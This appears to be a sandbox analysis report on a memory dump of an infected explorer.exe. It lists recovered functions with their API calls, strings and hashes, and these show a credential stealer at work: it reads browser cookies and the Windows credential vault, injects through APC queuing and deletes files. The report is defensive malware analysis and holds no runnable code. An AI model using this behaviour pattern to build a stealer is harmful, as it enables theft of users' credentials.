Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FindHeap$File$Free$AllocateCloseCriticalFirstNextObjectSectionSingleWaitlstrcatmemset$CreateDeleteDirectoryEnterLeavelstrlenmbstowcswcscpy
String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
API String ID: 159560555-4232923486
Opcode ID: b20f7fd21db7229e925de36fe469d8cc9488e20eb407c740d9c8124a51b2db65
Instruction ID: 6be7baae5cb302ba91bdd64b0ecd89c36f5d8a45d6eaa376afa188ef3bc6b537
Opcode Fuzzy Hash: b20f7fd21db7229e925de36fe469d8cc9488e20eb407c740d9c8124a51b2db65
Instruction Fuzzy Hash: A351AA70901619BFDB30DBA98C89CAFBBB8FB95700B010429F525EB155E7305A49ABB1

Uniqueness

Uniqueness Score: -1,00%

Function 01556306, Relevance: 21.2, APIs: 14, Instructions: 197sleepstringsynchronizationCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 015563B7
ExitProcess.KERNEL32 ref: 015563E3
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 015563E9
CreateEventA.KERNEL32(01599084,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,01541616), ref: 01556406
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 01556412
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 01556420
Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 0155642B
ResetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 01556432
CloseHandle.KERNEL32(00000000), ref: 01556439
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 01556517
RtlAddVectoredExceptionHandler.NTDLL(00000000,01554CFF), ref: 01556535
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 01556552
RtlRemoveVectoredExceptionHandler.NTDLL(01598F94), ref: 0155656A
WaitForSingleObject.KERNEL32(000000FF), ref: 01556584

Part of subcall function 015517CF: StrRChrA.SHLWAPI(01598FFC,00000000,0000005C), ref: 015517DF
Part of subcall function 015517CF: _strupr.NTDLL ref: 015517F5
Part of subcall function 015517CF: lstrlen.KERNEL32(01598FFC,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 015517FD
Part of subcall function 015517CF: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,01541616,?), ref: 0155181C

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Event$Process$CreateCurrentErrorExceptionHandlerLastVectoredlstrlen$CloseExitHandleObjectRemoveResetSingleSleepWait_strupr
String ID:
API String ID: 3739908374-0
Opcode ID: ad3686d0d6359f753394a87351f2fcb1aa4c94e818c795764fa0e69341804b61
Instruction ID: b8caf684b81d316ecbcc1559ac2b12f1414873f818d7886680db193082de8e7f
Opcode Fuzzy Hash: ad3686d0d6359f753394a87351f2fcb1aa4c94e818c795764fa0e69341804b61
Instruction Fuzzy Hash: 0A513B305412479FD7B0AF789C59A2E3E95BB95714F82051AF9718F084EB7484489BE3

Uniqueness

Uniqueness Score: -1,00%

Function 01560022, Relevance: 19.7, APIs: 13, Instructions: 233filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 01541566: RtlAllocateHeap.NTDLL(00000000,?,015606B7), ref: 01541572

memset.NTDLL ref: 015600C2
FindFirstFileW.KERNEL32(00000000,00000000), ref: 015600DD
memset.NTDLL ref: 01560140
wcscpy.NTDLL ref: 01560152
RtlEnterCriticalSection.NTDLL(?), ref: 015601AD

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

RtlLeaveCriticalSection.NTDLL(?), ref: 015601C9
FindNextFileW.KERNEL32(?,00000000), ref: 015601E2
WaitForSingleObject.KERNEL32(00000000), ref: 015601F4
FindClose.KERNEL32(?), ref: 01560209
FindFirstFileW.KERNEL32(00000000,00000000), ref: 0156021D
FindNextFileW.KERNEL32(?,00000000), ref: 015602B5
WaitForSingleObject.KERNEL32(00000000), ref: 015602C7
FindClose.KERNEL32(?), ref: 015602E2

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Find$File$CloseCriticalFirstHeapNextObjectSectionSingleWaitmemset$AllocateEnterFreeLeavewcscpy
String ID:
API String ID: 2408353863-0
Opcode ID: c712809eab2dec9d13ab2ae3c4dbf2659eae3d6e633cf9266f6e172e9a4c04d8
Instruction ID: 2c20b8607a212dfe9ca704d0ed641dcfafdf9639af192b50672e322eba72aa2d
Opcode Fuzzy Hash: c712809eab2dec9d13ab2ae3c4dbf2659eae3d6e633cf9266f6e172e9a4c04d8
Instruction Fuzzy Hash: 62818B70504306AFD761EF28CC85A5FBBE9FF88304F044819F9969B2A2D774D8499F92

Uniqueness

Uniqueness Score: -1,00%

Function 0154C557, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 245libraryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0154C57A
memset.NTDLL ref: 0154C58D
GetVersionExW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 0154C5A2
LoadLibraryW.KERNEL32(0156E7C8), ref: 0154C5D2
memcmp.NTDLL ref: 0154C6C9
memcmp.NTDLL ref: 0154C743

Part of subcall function 0154BECD: lstrcpyW.KERNEL32(00000000,?), ref: 0154BF1C
Part of subcall function 0154BECD: lstrcatW.KERNEL32(00000000), ref: 0154BF24

FreeLibrary.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 0154C83C

Strings

VaultGetItem, xrefs: 0154C609, 0154C60E, 0154C617

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Librarymemcmpmemset$FreeLoadVersionlstrcatlstrcpy
String ID: VaultGetItem
API String ID: 2628670962-4031649104
Opcode ID: d4567e8111ddfd8be7af5b1fd655082e2d1ce0610ea8323c04d1a0a7c5c2e67b
Instruction ID: 4b4382752941b1e6cd59fd2177928e210f22c11bc702c015ec2fa46c383bc2b3
Opcode Fuzzy Hash: d4567e8111ddfd8be7af5b1fd655082e2d1ce0610ea8323c04d1a0a7c5c2e67b
Instruction Fuzzy Hash: EF91E472901249AFEF24DF69CC8599E3BB9FF88348B00482EFA159A211D735D895DF90

Uniqueness

Uniqueness Score: -1,00%

Function 01552003, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 015624AD: lstrlen.KERNEL32(?,00000000,00000000,0156E0EC,01545FD1,0159B48E), ref: 015624B7
Part of subcall function 015624AD: mbstowcs.NTDLL ref: 015624D6

FindFirstFileA.KERNEL32 ref: 01552068
lstrcpy.KERNEL32(00000000,00000000), ref: 01552094
GetFileAttributesA.KERNEL32(00000000), ref: 015520AB
mbstowcs.NTDLL ref: 015520E5
FindNextFileA.KERNEL32(?,?), ref: 01552115
FindClose.KERNEL32(000000FF), ref: 01552127

Strings

., xrefs: 0155208B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FileFind$mbstowcs$AttributesCloseFirstNextlstrcpylstrlen
String ID: .
API String ID: 1015589708-248832578
Opcode ID: 7088e69408ba1a97e4fe4f5a0892b01d7103222b43385ee26938bc2cd7845e0e
Instruction ID: e30f33e33d49ffd11f46ac93476fed743248727a280daf9d5dffe4f85d3f62a5
Opcode Fuzzy Hash: 7088e69408ba1a97e4fe4f5a0892b01d7103222b43385ee26938bc2cd7845e0e
Instruction Fuzzy Hash: BB31E530001305AFE720EF25DC89E6F3FACFB86754F010429F6549B1A0D6759809DBA2

Uniqueness

Uniqueness Score: -1,00%

Function 01560316, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110filesynchronizationCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,01598AFC,00000000,015980F4), ref: 0156034C
WaitForSingleObject.KERNEL32(00000005,00000000), ref: 01560372
FindNextFileW.KERNEL32(?,00000010), ref: 0156046C
FindClose.KERNEL32(?), ref: 0156047D

Strings

., xrefs: 01560383
., xrefs: 0156039A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNextObjectSingleWait
String ID: .$.
API String ID: 747556019-3769392785
Opcode ID: 652655410dbe16f5e3072c4edac1e78cdf3ee180203c380877da60d676d51cbc
Instruction ID: 606a677f13cdfda83314d880308eb1269f42dd3148888aa0bdd30addc08e52c9
Opcode Fuzzy Hash: 652655410dbe16f5e3072c4edac1e78cdf3ee180203c380877da60d676d51cbc
Instruction Fuzzy Hash: 7A41463150020AABDF329F58DD48BDE7BB9BF0430AF044191FA04AA0A1E771CAA5DBD1

Uniqueness

Uniqueness Score: -1,00%

Function 015518D9, Relevance: 10.6, APIs: 7, Instructions: 65threadprocesslibraryCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0155190B
GetModuleHandleA.KERNEL32(0159A000,0159B0A8,00000004,00000000), ref: 01551922
GetProcAddress.KERNEL32(00000000), ref: 01551929
Thread32First.KERNEL32(?,0000001C), ref: 01551939
OpenThread.KERNEL32(001F03FF,00000000,?,?,0000001C), ref: 01551954
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 01551965
Thread32Next.KERNEL32(?,0000001C), ref: 01551975

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Thread32$AddressCreateFirstHandleModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 190292596-0
Opcode ID: 254c4bf8c641823acaff8b83c84726f85c2eca725b4217a7e4f5e33ef7e5539c
Instruction ID: 6f1120492f5c1ffc59c6742101415bb9381edb6366153d4fa56ef0f55f868aa4
Opcode Fuzzy Hash: 254c4bf8c641823acaff8b83c84726f85c2eca725b4217a7e4f5e33ef7e5539c
Instruction Fuzzy Hash: 5F11907290011DFFEF21AFA8DC85EEE7F79FB44351B04402AFA11AB050D7718985ABA1

Uniqueness

Uniqueness Score: -1,00%

Function 0154482F, Relevance: 9.2, APIs: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(?,?), ref: 01544855
lstrlen.KERNEL32(?), ref: 01544866
lstrlen.KERNEL32(?), ref: 015448CA
lstrlen.KERNEL32(?), ref: 01544912
lstrlen.KERNEL32(?), ref: 01544954
GetVolumeInformationA.KERNEL32(0159A716,00000000,00000000,?,00000004,?,00000000,00000000), ref: 015449B2

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: lstrlen$ComputerInformationNameVolume
String ID:
API String ID: 2455748766-0
Opcode ID: 14b1472d72849afa175e9a7843b91d8ea44feb6c371771dddf85f14a77d927a4
Instruction ID: fded5e6f9be85eb69a0e14f0afb0e4ec22e9a3982cfe8faa46be70559a5c5ca0
Opcode Fuzzy Hash: 14b1472d72849afa175e9a7843b91d8ea44feb6c371771dddf85f14a77d927a4
Instruction Fuzzy Hash: 4B514BB690021DABCF10CFA5CC85DDFBBBCFB49310F1181A6E615EB104DA705A49DBA0

Uniqueness

Uniqueness Score: -1,00%

Function 015568A7, Relevance: 9.1, APIs: 6, Instructions: 131fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01543D31: lstrlenW.KERNEL32(?,01556AC4,00000000,00000000,0156E0D8,01556CAB,?,00000000,?,00000000,?), ref: 01543D3C

memset.NTDLL ref: 01556905
FindFirstFileW.KERNEL32(0156E0D8,?,00000000,00000000,0156E0D8), ref: 01556917
LocalFree.KERNEL32(00000000,00000000,?,00000000), ref: 01556A1D
FindNextFileW.KERNEL32(00000000,00000010,00000000,?,0156E44C), ref: 01556A2D
FindClose.KERNEL32(00000000), ref: 01556A3E
LocalFree.KERNEL32(0156E0D8), ref: 01556A47

Part of subcall function 01543D5A: lstrcpyW.KERNEL32(00000000,000007FF), ref: 01543D97
Part of subcall function 01543D5A: lstrcatW.KERNEL32(00000000,?), ref: 01543D9F

Part of subcall function 01543DAD: LocalFree.KERNEL32(?,0156E44C,00000000,01556E1E,00000000,?,0156E44C,?,?,?,00000000,00000002), ref: 01543DC1

Part of subcall function 01543FD5: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 01543FEF
Part of subcall function 01543FD5: CloseHandle.KERNEL32(00000000), ref: 01543FFC

Part of subcall function 015441CE: LocalFree.KERNEL32(00000000), ref: 01544205
Part of subcall function 015441CE: LocalFree.KERNEL32(00000000), ref: 01544244

Part of subcall function 01556617: lstrcpy.KERNEL32(?,?), ref: 0155662A
Part of subcall function 01556617: lstrcat.KERNEL32(?,0156EF44), ref: 0155663C
Part of subcall function 01556617: LoadLibraryA.KERNEL32(?), ref: 01556649

Part of subcall function 015567AF: memcpy.NTDLL(00000000,?,?,?,00000000,0156E44C,?,?,?,?,01556A0A,00000000,00000000,00000000), ref: 015567E4
Part of subcall function 015567AF: lstrlen.KERNEL32(#TBSTEALER#,?,00000000,0156E44C,?,?,?,?,01556A0A,00000000,00000000,00000000), ref: 015567FF
Part of subcall function 015567AF: lstrcpy.KERNEL32(00000000,#TBSTEALER#), ref: 01556815
Part of subcall function 015567AF: lstrcat.KERNEL32(00000000,00000000), ref: 0155681E
Part of subcall function 015567AF: LocalFree.KERNEL32(00000000,00000000,0156EF14,00000000,0156EF2C,?,?,?,?,01556A0A,00000000,00000000,00000000), ref: 01556875

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeLocal$FileFindlstrcatlstrcpy$Closelstrlen$CreateFirstHandleLibraryLoadNextmemcpymemset
String ID:
API String ID: 3464241586-0
Opcode ID: c35d419aa28551efad30df0ab53019c2e145786218c433a12f8943a105ecc02b
Instruction ID: 4b83dff36491543b36516ed9e676e1f94bd3cfc2e1ab5bebe3d16410cc0dc554
Opcode Fuzzy Hash: c35d419aa28551efad30df0ab53019c2e145786218c433a12f8943a105ecc02b
Instruction Fuzzy Hash: 9241F43190119AFBDFA1EBA9DC64A9E7BBCBF44250F544066EE05EF010DBB0CA449B91

Uniqueness

Uniqueness Score: -1,00%

Function 0156048A, Relevance: 9.1, APIs: 6, Instructions: 115fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01541566: RtlAllocateHeap.NTDLL(00000000,?,015606B7), ref: 01541572

FindFirstFileW.KERNEL32(?,00000000), ref: 01560509
RemoveDirectoryW.KERNEL32(?), ref: 01560583
DeleteFileW.KERNEL32(?), ref: 0156058E
FindNextFileW.KERNEL32(?,00000000), ref: 015605A1
FindClose.KERNEL32(?,00000208), ref: 015605C8

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FileFind$AllocateCloseDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 2683357873-0
Opcode ID: ad3c6aba566e7b3bb370145c7d453b691ab2a5a4752d10cae428a04c5515f949
Instruction ID: cb0519c2988a6b5d989cf38df257bd1693446ab6401d8b0ea72ecd7e829a5c2c
Opcode Fuzzy Hash: ad3c6aba566e7b3bb370145c7d453b691ab2a5a4752d10cae428a04c5515f949
Instruction Fuzzy Hash: 7E414B7080120AEBDF21AFA8C949AEDBFB9FF54314F144159F511AB1A0D7709A94EFD0

Uniqueness

Uniqueness Score: -1,00%

Function 01544A0A, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 01544A47
HeapFree.KERNEL32(00000000,?), ref: 01544A79
GetComputerNameW.KERNEL32(00000000,?), ref: 01544A87
RtlAllocateHeap.NTDLL(00000000,?), ref: 01544A9E
GetComputerNameW.KERNEL32(00000000,?), ref: 01544AAF
HeapFree.KERNEL32(00000000,00000000), ref: 01544AD1

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateComputerFreeName
String ID:
API String ID: 3439771632-0
Opcode ID: 091ba124f4eb667a5b6c7c618999e90958292fd657abf0a5f4b73b645ce33bb9
Instruction ID: 1554a2ce7c680831da75363c1beccff482a832ba956524a78646d4fd4c2b4ecc
Opcode Fuzzy Hash: 091ba124f4eb667a5b6c7c618999e90958292fd657abf0a5f4b73b645ce33bb9
Instruction Fuzzy Hash: 8D417171500289BFDB20DF78C8848BFBFFAFE4A2007569468D0A9DB605D230ED05EB50

Uniqueness

Uniqueness Score: -1,00%

Function 015527A1, Relevance: 7.5, APIs: 5, Instructions: 44pipethreadCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,01599084), ref: 015527C8
CreateThread.KERNEL32(00000000,00000000,Function_000114A4,00000000,00000000,?), ref: 015527E2
GetLastError.KERNEL32 ref: 015527F3
CloseHandle.KERNEL32(00000000), ref: 015527FC
GetLastError.KERNEL32 ref: 01552804

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CreateErrorLast$CloseHandleNamedPipeThread
String ID:
API String ID: 2018970776-0
Opcode ID: 2d1e2c6b927e959d9da897905fd5af80d9cbe0f1d67b5987afd69d810bcf70d2
Instruction ID: 5a023ee938a954bb9fc8c70f70adb282d8731c89f19ce66d4de159439e549fb3
Opcode Fuzzy Hash: 2d1e2c6b927e959d9da897905fd5af80d9cbe0f1d67b5987afd69d810bcf70d2
Instruction Fuzzy Hash: 16F0A475201210FBE3609A6E9C0DDAB3EADFBC6770F010125FA25DB1A4D6705809D7B1

Uniqueness

Uniqueness Score: -1,00%

Function 01544B2B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 01544B67
RtlAllocateHeap.NTDLL(00000000,00000027), ref: 01544C97
wsprintfA.USER32 ref: 01544CC4

Strings

Client, xrefs: 01544B79, 01544B7E, 01544C5B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocateHeapmemsetwsprintf
String ID: Client
API String ID: 3517362186-3236430179
Opcode ID: 6dbaad28cf07b42cd22752ab2928fa3927ed061efa748ad314e2f3fc95409666
Instruction ID: 1103a687b23d4abfe7b1bbf21e0efcd406e608db272fe73d1c29090112105e19
Opcode Fuzzy Hash: 6dbaad28cf07b42cd22752ab2928fa3927ed061efa748ad314e2f3fc95409666
Instruction Fuzzy Hash: AC419071800248ABDB259B66B854ABB3FF9FB0B304F5F0864E5749D149D3790508EB72

Uniqueness

Uniqueness Score: -1,00%

Function 01561803, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 01561834
RtlNtStatusToDosError.NTDLL(C000009A), ref: 0156186B

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: 35ff8bb9d238bc052931be128cacf59184706df97048b20ee0cf1986cd966aa8
Instruction ID: d161c9bccc12521148cf2bbc40364ab920ddca0ed5d429a7e5be8cc631aeeef9
Opcode Fuzzy Hash: 35ff8bb9d238bc052931be128cacf59184706df97048b20ee0cf1986cd966aa8
Instruction Fuzzy Hash: 6001DB37802926ABE721965989899FF7E6DFFD1A50F160124EE016F114DB348A4096D0

Uniqueness

Uniqueness Score: -1,00%

Function 0156135C, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0156137B
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 01561393

Part of subcall function 01561898: NtReadVirtualMemory.NTDLL(?,00000004,?,?,0156E0D8,?,?,0156B821,0156E0D8,?,?,00000004,?,00000000,0156E0D8,00000000), ref: 015618B6

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: InformationMemoryProcessQueryReadVirtualmemset
String ID:
API String ID: 3868834506-0
Opcode ID: 946c93275a5e783cd3ad9080a85fe3f1830ad8b726d12e5841a2f33cdd8a89f8
Instruction ID: 4b0796a79b6b409a9fabc312c692cedd6c09fe054dc64e12e0a94a3f2681fad1
Opcode Fuzzy Hash: 946c93275a5e783cd3ad9080a85fe3f1830ad8b726d12e5841a2f33cdd8a89f8
Instruction Fuzzy Hash: 60F06276A0021DBAEB20DA95CC45FEE7FBCEB44740F004061BA09EB180D370DB548BE0

Uniqueness

Uniqueness Score: -1,00%

Function 01565013, Relevance: 1.9, APIs: 1, Instructions: 610COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 015656AA

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 4d5a7b139c3476e9abcc06bb9ae338f73b2b39a56bc508310862d11b11950e99
Instruction ID: 042239acdd0c83249253fdf75eadfd1107ae3faf22163e2585863ced72677d2a
Opcode Fuzzy Hash: 4d5a7b139c3476e9abcc06bb9ae338f73b2b39a56bc508310862d11b11950e99
Instruction Fuzzy Hash: 3F22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1,00%

Function 0155FACA, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 0155FAE7

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 59956069e83787c7bb71ee59a5d86caee35b90852d2f4df781b1757465cb5cc4
Instruction ID: c3a4ffcfe062b6c1dd5ff8d46daa943c0ff30ea6ab0df2fbcb1c6cd70aa31e01
Opcode Fuzzy Hash: 59956069e83787c7bb71ee59a5d86caee35b90852d2f4df781b1757465cb5cc4
Instruction Fuzzy Hash: 0FF0A777901218A7EB1095A9DD05FCE77ECE744270F110522EB01BB0C4D674AD0987E9

Uniqueness

Uniqueness Score: -1,00%

Function 01560AAA, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,00000000,00000000,00000018,00000000), ref: 01560ABD

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b320d8277152ed0803cb5cebb58133121a26d23f9b306b68d4f4be25054f410f
Instruction ID: 57eb3842b9f2c645f3b36c4fe28a76c5769ca8733559788bb078643dea32210f
Opcode Fuzzy Hash: b320d8277152ed0803cb5cebb58133121a26d23f9b306b68d4f4be25054f410f
Instruction Fuzzy Hash: BEF05E313002259B8720CA59C889DAFBBACFB017A07518314F915EF2D1D260E906D7E0

Uniqueness

Uniqueness Score: -1,00%

Function 015C526B, Relevance: .6, Instructions: 610COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d5a7b139c3476e9abcc06bb9ae338f73b2b39a56bc508310862d11b11950e99
Instruction ID: 0a3c30e7325e14ce9d1967f19f314817085586a4c20901212f0dde0966ff0fd0
Opcode Fuzzy Hash: 4d5a7b139c3476e9abcc06bb9ae338f73b2b39a56bc508310862d11b11950e99
Instruction Fuzzy Hash: FE22837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1,00%

Function 0155B6F4, Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9e1669532436f6269830b97b9521eb48df8d4809ebca922179287a559cd5459
Instruction ID: 14e88f2a3b56da289d0e4893b6348df04da027804ea23c60a58752f7c3a772b2
Opcode Fuzzy Hash: f9e1669532436f6269830b97b9521eb48df8d4809ebca922179287a559cd5459
Instruction Fuzzy Hash: D0025671500202CFDBA5CF28C8E87A97BA2FF49354F1985BAEC598F25AD730D945CB90

Uniqueness

Uniqueness Score: -1,00%

Function 01557DD0, Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16599ccfafe319a47deaa3c6027a0c7c649c7d04d0d7647bd68f48afacf02fb7
Instruction ID: 9d4fbe59901dd1984b485bbbff93e9693c09cd9777f9759c24e931e857a28419
Opcode Fuzzy Hash: 16599ccfafe319a47deaa3c6027a0c7c649c7d04d0d7647bd68f48afacf02fb7
Instruction Fuzzy Hash: 97E16A715147028BE355CF29C5A4269FBF1FF46324F59879ED5AA8F292C370A980CB84

Uniqueness

Uniqueness Score: -1,00%

Function 01563BFD, Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a447722225270644dbede3cb9e19792a0e8c834420987eee6ca5217cc507c224
Instruction ID: 51bbc72e487b15d3ded82cf491c5bc4db99c4c9c6019ff3341e6d6140bcfed03
Opcode Fuzzy Hash: a447722225270644dbede3cb9e19792a0e8c834420987eee6ca5217cc507c224
Instruction Fuzzy Hash: 0AC1FE77E14F668BCB188E88D8C054973A3A7DC310F5F42BDAE45AB346CBB4BD118685

Uniqueness

Uniqueness Score: -1,00%

Function 015C3E55, Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a447722225270644dbede3cb9e19792a0e8c834420987eee6ca5217cc507c224
Instruction ID: 51bbc72e487b15d3ded82cf491c5bc4db99c4c9c6019ff3341e6d6140bcfed03
Opcode Fuzzy Hash: a447722225270644dbede3cb9e19792a0e8c834420987eee6ca5217cc507c224
Instruction Fuzzy Hash: 0AC1FE77E14F668BCB188E88D8C054973A3A7DC310F5F42BDAE45AB346CBB4BD118685

Uniqueness

Uniqueness Score: -1,00%

Function 015BBDDC, Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
